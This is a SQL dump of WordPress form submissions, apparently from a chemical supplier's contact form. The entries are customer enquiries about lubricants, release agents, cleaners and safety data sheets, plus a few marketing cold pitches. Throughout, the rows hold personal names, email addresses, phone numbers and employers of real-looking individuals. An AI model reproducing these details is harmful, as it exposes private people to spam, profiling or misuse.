INSERT INTO `wp_postmeta` VALUES (39763, 4632, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39764, 4632, '_field_1', 'hsueh-ying chen'); 
INSERT INTO `wp_postmeta` VALUES (39765, 4632, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (39766, 4632, '_field_2', 'hsueh-ying.chen@nih.gov'); 
INSERT INTO `wp_postmeta` VALUES (39767, 4632, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39768, 4632, '_field_3', 'Can you please send me the quote or price of your product (part number MS-111)? Thanks.'); 
INSERT INTO `wp_postmeta` VALUES (39769, 4632, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39770, 4632, '_sub_id', '4632'); 
INSERT INTO `wp_postmeta` VALUES (39771, 4633, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39772, 4633, '_seq_num', '754'); 
INSERT INTO `wp_postmeta` VALUES (39773, 4633, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39774, 4633, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39775, 4633, '_field_1', 'RON MORNSON'); 
INSERT INTO `wp_postmeta` VALUES (39776, 4633, '_field_10', 'COLUMBIA PRECISION MACHINE CORP'); 
INSERT INTO `wp_postmeta` VALUES (39777, 4633, '_field_2', 'rmornson@columbiapmc.com'); 
INSERT INTO `wp_postmeta` VALUES (39778, 4633, '_field_8', '(952) 890-1003'); 
INSERT INTO `wp_postmeta` VALUES (39779, 4633, '_field_3', 'Request price and availability on one gallon of Dry Lube.'); 
INSERT INTO `wp_postmeta` VALUES (39780, 4633, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39781, 4633, '_sub_id', '4633'); 
INSERT INTO `wp_postmeta` VALUES (39782, 4634, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39783, 4634, '_seq_num', '755'); 
INSERT INTO `wp_postmeta` VALUES (39784, 4634, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39785, 4634, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39786, 4634, '_field_1', 'Michael'); 
INSERT INTO `wp_postmeta` VALUES (39787, 4634, '_field_10', 'Kaiser Optical'); 
INSERT INTO `wp_postmeta` VALUES (39788, 4634, '_field_2', 'michael.stidham@kosi.endress.com'); 
INSERT INTO `wp_postmeta` VALUES (39789, 4634, '_field_8', '(734) 665-8083'); 
INSERT INTO `wp_postmeta` VALUES (39790, 4634, '_field_3', 'looking for a PTFE mold release at after cure the only thing left on the metal is the PTFE?\nthank you,'); 
INSERT INTO `wp_postmeta` VALUES (39791, 4634, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39792, 4634, '_sub_id', '4634'); 
INSERT INTO `wp_postmeta` VALUES (39793, 4635, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39794, 4635, '_seq_num', '756'); 
INSERT INTO `wp_postmeta` VALUES (39795, 4635, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39796, 4635, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39797, 4635, '_field_1', 'David Hazell'); 
INSERT INTO `wp_postmeta` VALUES (39798, 4635, '_field_10', 'Maritime Helicopter Support Company'); 
INSERT INTO `wp_postmeta` VALUES (39799, 4635, '_field_2', 'david.w.hazell@lmco.com'); 
INSERT INTO `wp_postmeta` VALUES (39800, 4635, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39801, 4635, '_field_3', 'I am unable to find any information on product MS-122V/MS-122VM. I have obtained a SDS, which identifies Miller-Stephenson as the manufacturer, but I cannot find any information regarding the above product on your web site.  Any assistance would be greatly appreciated.\nThanks\nDave\n'); 
INSERT INTO `wp_postmeta` VALUES (39802, 4635, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39803, 4635, '_sub_id', '4635'); 
INSERT INTO `wp_postmeta` VALUES (39804, 4636, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39805, 4636, '_seq_num', '757'); 
INSERT INTO `wp_postmeta` VALUES (39806, 4636, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39807, 4636, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39808, 4636, '_field_1', 'Sean Trueman-Mitchell'); 
INSERT INTO `wp_postmeta` VALUES (39809, 4636, '_field_10', 'CMCAUK'); 
INSERT INTO `wp_postmeta` VALUES (39810, 4636, '_field_2', 'Sean.Trueman-Mitchell@cmcauk.co.uk'); 
INSERT INTO `wp_postmeta` VALUES (39811, 4636, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39812, 4636, '_field_3', 'Good Afternoon, CMCA(UK) Ltd are carrying out ongoing component obsolescence checking and need to confirm the following part number is still being manufactured.\nMS-122XD  -  lubricant\nAs we are doing this to confirm to our client and close there report any help you can give is appreciated.\nThank You'); 
INSERT INTO `wp_postmeta` VALUES (39813, 4636, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39814, 4636, '_sub_id', '4636'); 
INSERT INTO `wp_postmeta` VALUES (39815, 4637, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39816, 4637, '_seq_num', '758'); 
INSERT INTO `wp_postmeta` VALUES (39817, 4637, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39818, 4637, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39819, 4637, '_field_1', 'Hollie McGrath'); 
INSERT INTO `wp_postmeta` VALUES (39820, 4637, '_field_10', 'Hudson Lock LLC'); 
INSERT INTO `wp_postmeta` VALUES (39821, 4637, '_field_2', 'hmcgrath@hudsonlock.com'); 
INSERT INTO `wp_postmeta` VALUES (39822, 4637, '_field_8', '(978) 562-3481'); 
INSERT INTO `wp_postmeta` VALUES (39823, 4637, '_field_3', 'Good morning!\r\nWe use your MS-944/CO2 cleaning solvent &amp; it doesn&#039;t look like you carry it anymore. If not do you have a compatible replacement?\r\nThank you!\r\nHollie'); 
INSERT INTO `wp_postmeta` VALUES (39824, 4637, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39825, 4637, '_sub_id', '4637'); 
INSERT INTO `wp_postmeta` VALUES (39826, 4638, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (39827, 4638, '_seq_num', '326'); 
INSERT INTO `wp_postmeta` VALUES (39828, 4638, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39829, 4638, '_field_12', 'Dorota Pakula'); 
INSERT INTO `wp_postmeta` VALUES (39830, 4638, '_field_13', 'Brush HMA'); 
INSERT INTO `wp_postmeta` VALUES (39831, 4638, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (39832, 4638, '_field_14', 'dorota.pakula@brush.eu'); 
INSERT INTO `wp_postmeta` VALUES (39833, 4638, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (39834, 4638, '_field_16', 'Good afternoon, \nWe are using your PTFT Realease Agent MS-143E in red colour. According to our local supplier you do not produce this MS-143E anymore. Could MS-143H be an alternative material or do you advice some other product? According to the technical specification of MS-143E and MS-143H thery are the same. What is diffrent between those two materials? Is MS-143H (or old MS-143E) in red colour available? \nThank you very much in advance for your answer. \nBest regards, Dorota Pakula'); 
INSERT INTO `wp_postmeta` VALUES (39835, 4638, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (39836, 4638, '_sub_id', '4638'); 
INSERT INTO `wp_postmeta` VALUES (39837, 4639, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39838, 4639, '_seq_num', '759'); 
INSERT INTO `wp_postmeta` VALUES (39839, 4639, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39840, 4639, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39841, 4639, '_field_1', 'Robert Friebel'); 
INSERT INTO `wp_postmeta` VALUES (39842, 4639, '_field_10', 'Gentex Corporation'); 
INSERT INTO `wp_postmeta` VALUES (39843, 4639, '_field_2', 'rfriebel@gentexcorp.com'); 
INSERT INTO `wp_postmeta` VALUES (39844, 4639, '_field_8', '(603) 657-1277'); 
INSERT INTO `wp_postmeta` VALUES (39845, 4639, '_field_3', 'I am looking for a mold release for a urethane elastomer.  It is Polyset  molding compound.  The datasheet is not available on the internet, please send me an email and I will email the technical bulletin'); 
INSERT INTO `wp_postmeta` VALUES (39846, 4639, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39847, 4639, '_sub_id', '4639'); 
INSERT INTO `wp_postmeta` VALUES (39848, 4640, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39849, 4640, '_seq_num', '760'); 
INSERT INTO `wp_postmeta` VALUES (39850, 4640, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39851, 4640, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39852, 4640, '_field_1', 'Dr. Alexandra Jung'); 
INSERT INTO `wp_postmeta` VALUES (39853, 4640, '_field_10', 'Karlsruhe Institute of Technology'); 
INSERT INTO `wp_postmeta` VALUES (39854, 4640, '_field_2', 'alexandra.jung@kit.edu'); 
INSERT INTO `wp_postmeta` VALUES (39855, 4640, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39856, 4640, '_field_3', 'Dear Sir or Madam, \ncurrently our msds data base is missing the msds of on of your products, namely:\nMS-260 Cleaner for Plastic-Glass-Metall.\nCould you please send this data sheet to the above mentioned E-Mail-adress?\n\nThank you\n\nAlexandra Jung\n'); 
INSERT INTO `wp_postmeta` VALUES (39857, 4640, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39858, 4640, '_sub_id', '4640'); 
INSERT INTO `wp_postmeta` VALUES (39859, 4641, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39860, 4641, '_seq_num', '761'); 
INSERT INTO `wp_postmeta` VALUES (39861, 4641, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39862, 4641, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39863, 4641, '_field_1', 'Warren Gaudreau'); 
INSERT INTO `wp_postmeta` VALUES (39864, 4641, '_field_10', 'CardioFocus, inc.'); 
INSERT INTO `wp_postmeta` VALUES (39865, 4641, '_field_2', 'wgaudreau@cardiofocus.com'); 
INSERT INTO `wp_postmeta` VALUES (39866, 4641, '_field_8', '(508) 658-7266'); 
INSERT INTO `wp_postmeta` VALUES (39867, 4641, '_field_3', 'I cannot find an SDS for your MS-143DF PTFE Release Agent. Can you provide one?'); 
INSERT INTO `wp_postmeta` VALUES (39868, 4641, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39869, 4641, '_sub_id', '4641'); 
INSERT INTO `wp_postmeta` VALUES (39870, 4642, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39871, 4642, '_seq_num', '762'); 
INSERT INTO `wp_postmeta` VALUES (39872, 4642, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39873, 4642, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39874, 4642, '_field_1', 'Lisa Nelson'); 
INSERT INTO `wp_postmeta` VALUES (39875, 4642, '_field_10', 'DCA Manufacturing'); 
INSERT INTO `wp_postmeta` VALUES (39876, 4642, '_field_2', 'lnelson@dcamfg.com'); 
INSERT INTO `wp_postmeta` VALUES (39877, 4642, '_field_8', '(715) 822-6464'); 
INSERT INTO `wp_postmeta` VALUES (39878, 4642, '_field_3', 'We use MS-472C on some of our circuit board assemblies, and I am inquiring into whether this product is compatible with ROHS-compliance.  Please advise. Thank you!'); 
INSERT INTO `wp_postmeta` VALUES (39879, 4642, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39880, 4642, '_sub_id', '4642'); 
INSERT INTO `wp_postmeta` VALUES (39881, 4643, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39882, 4643, '_seq_num', '763'); 
INSERT INTO `wp_postmeta` VALUES (39883, 4643, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39884, 4643, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39885, 4643, '_field_1', 'Wyatt Taylor'); 
INSERT INTO `wp_postmeta` VALUES (39886, 4643, '_field_10', 'Photometrics'); 
INSERT INTO `wp_postmeta` VALUES (39887, 4643, '_field_2', 'WTaylor@Photometrics.com'); 
INSERT INTO `wp_postmeta` VALUES (39888, 4643, '_field_8', '(520) 547-2631'); 
INSERT INTO `wp_postmeta` VALUES (39889, 4643, '_field_3', 'Hello, \r\n\r\nMy name is Wyatt Taylor, a Mechanical Engineering Intern for Photometrics, a life sciences camera design company in Tucson, AZ. Currently I am working on a Printed Circuit Board chamber seal design for an upcoming camera. To achieve the necessary seal, I would like to test a PCB with a conformal coating on its surface. The main aspect I am concerned about is the permeation rate of water vapor. Can you make a recommendation on the conformal coating I might use for this application?\r\n\r\nThank you,\r\n\r\nWyatt '); 
INSERT INTO `wp_postmeta` VALUES (39890, 4643, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39891, 4643, '_sub_id', '4643'); 
INSERT INTO `wp_postmeta` VALUES (39892, 4644, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39893, 4644, '_seq_num', '764'); 
INSERT INTO `wp_postmeta` VALUES (39894, 4644, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39895, 4644, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39896, 4644, '_field_1', 'summer'); 
INSERT INTO `wp_postmeta` VALUES (39897, 4644, '_field_10', 'china'); 
INSERT INTO `wp_postmeta` VALUES (39898, 4644, '_field_2', 'summerxlty@hotmail.com'); 
INSERT INTO `wp_postmeta` VALUES (39899, 4644, '_field_8', '09173420196'); 
INSERT INTO `wp_postmeta` VALUES (39900, 4644, '_field_3', 'am summer from Baoji Seabird Metal Material Co.,Ltd with 16 years processing experience in the nitinol \r\nfields . one of white hair for Nitinol business in china since 2001 years,our core competencies is \r\nnitinol wire .bar ,sheet ,tube ,spring with the AF -20℃-110℃. and our niche market is USA ,Germany ,UK .\r\nIsrael . our value message (with us your money in safe .your business in safe )\r\n\r\nwe are one of nitinol products industry veteran . so we have ability to control products&#039; quality from raw material \r\nto finished products . control delivery time and also provide competitive price to you . our products access \r\nISO9001:2008 and biocompatibility certificate .\r\n\r\n\r\n15 engineers who has 20 years processing and research experience they are from Northwest institute . \r\nour company not only sell products but also provide good after sale service . believe we can help you to\r\nresolve all of question about you . \r\n\r\n\r\nAny question about the nitinol products please feel free contact me with no hesitate\r\n\r\nSincertiy hope can hearing from you soon\r\n\r\nBest Regards\r\nSummer\r\n'); 
INSERT INTO `wp_postmeta` VALUES (39901, 4644, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39902, 4644, '_sub_id', '4644'); 
INSERT INTO `wp_postmeta` VALUES (39903, 4645, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39904, 4645, '_seq_num', '765'); 
INSERT INTO `wp_postmeta` VALUES (39905, 4645, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39906, 4645, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39907, 4645, '_field_1', 'Ryan Brown'); 
INSERT INTO `wp_postmeta` VALUES (39908, 4645, '_field_10', 'SEO'); 
INSERT INTO `wp_postmeta` VALUES (39909, 4645, '_field_2', 'ryan.brown20122@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (39910, 4645, '_field_8', '(516) 734-6067'); 
INSERT INTO `wp_postmeta` VALUES (39911, 4645, '_field_3', 'Hello Sir/Madam,\r\n\r\nHope you&#039;re having a great day!\r\n\r\nI&#039;m Ryan,  SEO consultant.\r\nI would like to tell you some points about your online business. I hope you won’t mind spending only 2-3 minutes to have a look at the following lines:\r\n\r\nIt seems you&#039;ve been spending budget with sponsored listing or PPC.\r\n\r\n. In PPC, you may get the sales but only after paying a certain amount every time and if you stop paying, then the sales will be vanished soon.\r\n\r\n . In SEO, You need to spend budget for few months. Once keywords will be in first page of Google, you can get satisfied traffic for long time. \r\n\r\n. 90% of users like Organic results over the sponsored ones because these results are more relevant and valuable. So just imagine how many valuable customers you are losing by not focusing on organic search results.\r\n\r\nBy investing a few months in SEO, you can see drastic changes in your website internally and externally. We&#039;ll show you TOP Rankings in your keywords, link popularity, organic traffic and many more...\r\n\r\nAfter reviewing your website  miller-stephenson.com I noticed some major on-page and off-page issues need to be fixed soon. For more information about your site errors, please respond to my email.\r\n\r\nI would be happy to provide you Complete Site Analysis Report (free of cost) with our Company Profile, Work Experience and Client Testimonials. \r\n\r\nOur main AIM is customer satisfaction. We are not like others. We&#039;ve limited customers and make it sure they are really happy with our performance. \r\n\r\nYou may be interested with Big Big Companies but I can say they&#039;re taking money only showing their company brand to customers otherwise the result part is Zero. Decision is yours!\r\n\r\nWe wish you the best of luck and looking forward to a long and healthy business relationship with you and your company.\r\n\r\nWaiting for your positive response… \r\n\r\nBest Regards,\r\n----------------------------------\r\nRyan Brown\r\nMarketing Executive\r\n173 Blueberry Lane, Hicksville, New York 11801, USA\r\nSkype: ryan.brown7632\r\nEmail: ryan.brown20122@gmail.com\r\nPhone: ?+1 (516) 734-6067\r\n\r\nCONFIDENTIALITY NOTICE: This e-mail, including any attachments, is for the sole use of the intended recipient(s) and may contain confidential and privileged information. Any unauthorized review, use or distribution is prohibited. If you are not the intended recipient, please contact the sender immediately and destroy all copies of the original message. Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (39912, 4645, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39913, 4645, '_sub_id', '4645'); 
INSERT INTO `wp_postmeta` VALUES (39914, 4647, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39915, 4647, '_seq_num', '766'); 
INSERT INTO `wp_postmeta` VALUES (39916, 4647, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39917, 4647, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39918, 4647, '_field_1', 'Cindy'); 
INSERT INTO `wp_postmeta` VALUES (39919, 4647, '_field_10', 'Edgetech'); 
INSERT INTO `wp_postmeta` VALUES (39920, 4647, '_field_2', 'Cindy.logan@edgetech.com'); 
INSERT INTO `wp_postmeta` VALUES (39921, 4647, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39922, 4647, '_field_3', 'Could I please have the latest SDS documents for:\n\nMS-260 Safezone Cleaner\nMS-538 DPMS-D0129A Contact Re-Nu &amp; lube\nMS-222N, MS-222T, MS-222F, Aero-Duster\n\nThank you,\nCindy Logan'); 
INSERT INTO `wp_postmeta` VALUES (39923, 4647, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39924, 4647, '_sub_id', '4647'); 
INSERT INTO `wp_postmeta` VALUES (39925, 4648, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39926, 4648, '_seq_num', '767'); 
INSERT INTO `wp_postmeta` VALUES (39927, 4648, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39928, 4648, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39929, 4648, '_field_1', 'Jack Woodall'); 
INSERT INTO `wp_postmeta` VALUES (39930, 4648, '_field_10', 'SQM North America'); 
INSERT INTO `wp_postmeta` VALUES (39931, 4648, '_field_2', 'jack.woodall@sqm.com'); 
INSERT INTO `wp_postmeta` VALUES (39932, 4648, '_field_8', '(404) 610-6676'); 
INSERT INTO `wp_postmeta` VALUES (39933, 4648, '_field_3', 'To Whom it May Concern:\n\nMy name is Jack Woodall and I work for SQM North America Corporation.  We are one of the largest LiOH producers in the world and we stock our product right here in the US.  \n\nI would like to understand your business, applications and what, if anything SQM can do to assist you in the future.  Please feel free to reach out to me any time at one of my numbers below or let me know a good time to call you.\n\nI look forward to hearing back from you.\n\nSincerely,\nJack Woodall\n770-927-9427'); 
INSERT INTO `wp_postmeta` VALUES (39934, 4648, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39935, 4648, '_sub_id', '4648'); 
INSERT INTO `wp_postmeta` VALUES (39936, 4649, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39937, 4649, '_seq_num', '768'); 
INSERT INTO `wp_postmeta` VALUES (39938, 4649, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39939, 4649, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39940, 4649, '_field_1', 'Doug Harvey'); 
INSERT INTO `wp_postmeta` VALUES (39941, 4649, '_field_10', 'AOSense'); 
INSERT INTO `wp_postmeta` VALUES (39942, 4649, '_field_2', 'dharvey@aosense.com'); 
INSERT INTO `wp_postmeta` VALUES (39943, 4649, '_field_8', '(408) 735-9500'); 
INSERT INTO `wp_postmeta` VALUES (39944, 4649, '_field_3', 'Hello, we would like to order your epoxy dissolver MS-111.  Please send me a quote for one quart.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (39945, 4649, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39946, 4649, '_sub_id', '4649'); 
INSERT INTO `wp_postmeta` VALUES (39947, 4650, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39948, 4650, '_seq_num', '769'); 
INSERT INTO `wp_postmeta` VALUES (39949, 4650, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39950, 4650, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39951, 4650, '_field_1', 'Mohammad Hamza Kirmani'); 
INSERT INTO `wp_postmeta` VALUES (39952, 4650, '_field_10', 'Georgia Institute of Technology'); 
INSERT INTO `wp_postmeta` VALUES (39953, 4650, '_field_2', 'kirmani.hamza@gatech.edu'); 
INSERT INTO `wp_postmeta` VALUES (39954, 4650, '_field_8', '(470) 265-0076'); 
INSERT INTO `wp_postmeta` VALUES (39955, 4650, '_field_3', 'Hello,\r\n\r\nI am looking for a Mold release Agent compatible with Thermosets and which could be kept at temperatures around 230 C for long times (6-10) hours. The process used being RIM.\r\n\r\nPlease suggest which of your products would be the best choice.\r\n\r\nThanks,\r\nMohammad'); 
INSERT INTO `wp_postmeta` VALUES (39956, 4650, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39957, 4650, '_sub_id', '4650'); 
INSERT INTO `wp_postmeta` VALUES (39958, 4651, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39959, 4651, '_seq_num', '770'); 
INSERT INTO `wp_postmeta` VALUES (39960, 4651, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39961, 4651, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39962, 4651, '_field_1', 'Richard Curtis'); 
INSERT INTO `wp_postmeta` VALUES (39963, 4651, '_field_10', 'TAE Aerospace'); 
INSERT INTO `wp_postmeta` VALUES (39964, 4651, '_field_2', 'richard.curtis@taeaviation.com.au'); 
INSERT INTO `wp_postmeta` VALUES (39965, 4651, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39966, 4651, '_field_3', 'Hello,\r\nSeveral years ago we purchased a container of Dupont Krytox GPL 212 Grease from your company. With the product we received a Certificate of Analysis stating the shelf life is indefinite in an unopened container. There is no detail as to the life of the product once the container is opened. Are you able to provide this information as I am unable to locate any via the web.\r\n\r\nRegards Richard.'); 
INSERT INTO `wp_postmeta` VALUES (39967, 4651, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39968, 4651, '_sub_id', '4651'); 
INSERT INTO `wp_postmeta` VALUES (39969, 4652, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39970, 4652, '_seq_num', '771'); 
INSERT INTO `wp_postmeta` VALUES (39971, 4652, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39972, 4652, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39973, 4652, '_field_1', 'Kai Le'); 
INSERT INTO `wp_postmeta` VALUES (39974, 4652, '_field_10', 'http://www.zenjer.com'); 
INSERT INTO `wp_postmeta` VALUES (39975, 4652, '_field_2', 'leo@zenjer.com'); 
INSERT INTO `wp_postmeta` VALUES (39976, 4652, '_field_8', '+8613816200065'); 
INSERT INTO `wp_postmeta` VALUES (39977, 4652, '_field_3', 'MS-143TE RED '); 
INSERT INTO `wp_postmeta` VALUES (39978, 4652, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39979, 4652, '_sub_id', '4652'); 
INSERT INTO `wp_postmeta` VALUES (39980, 4653, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39981, 4653, '_seq_num', '772'); 
INSERT INTO `wp_postmeta` VALUES (39982, 4653, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39983, 4653, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39984, 4653, '_field_1', 'Jennette Davis'); 
INSERT INTO `wp_postmeta` VALUES (39985, 4653, '_field_10', 'Smarter Tactics'); 
INSERT INTO `wp_postmeta` VALUES (39986, 4653, '_field_2', 'jennettedavis.smartertactics@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (39987, 4653, '_field_8', '(877) 228-1545'); 
INSERT INTO `wp_postmeta` VALUES (39988, 4653, '_field_3', 'Hi,\r\n\r\nYour website&#039;s design is absolutely brilliant. The visuals really enhance your message and the content compels action. \r\n\r\nI&#039;ve forwarded it to a few of my contacts who I think could benefit from your services.\r\nWhen I was looking at your site, though, I noticed a mistake that you&#039;ve made re: search engine optimization. It&#039;s a \r\n\r\nrelatively important fix. Would you like me to write it up so that you can share it with your web team? If this is a \r\n\r\npriority, I can also get on a call.\r\n\r\nBest,\r\n\r\nJennette Davis\r\nDigital Marketing Manager\r\n(877) 228-1545\r\nSmarter Tactics\r\nDigital Marketing | AdWords Management | Content &amp; Social | Influencer Marketing'); 
INSERT INTO `wp_postmeta` VALUES (39989, 4653, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39990, 4653, '_sub_id', '4653'); 
INSERT INTO `wp_postmeta` VALUES (39991, 4654, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39992, 4654, '_seq_num', '773'); 
INSERT INTO `wp_postmeta` VALUES (39993, 4654, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39994, 4654, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39995, 4654, '_field_1', 'Dr Hisham Abdalla'); 
INSERT INTO `wp_postmeta` VALUES (39996, 4654, '_field_10', 'Laser LifeCare Institute'); 
INSERT INTO `wp_postmeta` VALUES (39997, 4654, '_field_2', 'me@drhisham.com'); 
INSERT INTO `wp_postmeta` VALUES (39998, 4654, '_field_8', '(642) 134-3439'); 
INSERT INTO `wp_postmeta` VALUES (39999, 4654, '_field_3', 'Happy 4th of July celebrations, from New Zealand.\r\nI am a dentist and educator to dentists and specialists from Auckland,\r\nI&#039;d like to bulk purchase you Fluoroextreme lubricant for my self and colleagues locally.\r\n\r\nCan you please give me your pricing schedule for 1L, 5L and 10L bottles/canisters and shipping to Nz?\r\nI don&#039;t believe it will be difficult to ship as it is not flammable, and is not a medical product per se, just a &#039;cleaning and maintenance oil&#039; for us (please note that when shipping for easier customs clearance. \r\n\r\nThank you in advance :-)\r\nYours in Health\r\nDr Hisham '); 
INSERT INTO `wp_postmeta` VALUES (40000, 4654, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40001, 4654, '_sub_id', '4654'); 
INSERT INTO `wp_postmeta` VALUES (40002, 4655, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40003, 4655, '_seq_num', '774'); 
INSERT INTO `wp_postmeta` VALUES (40004, 4655, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40005, 4655, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40006, 4655, '_field_1', 'Trevor Burghall'); 
INSERT INTO `wp_postmeta` VALUES (40007, 4655, '_field_10', 'Saskatoon Motor Products'); 
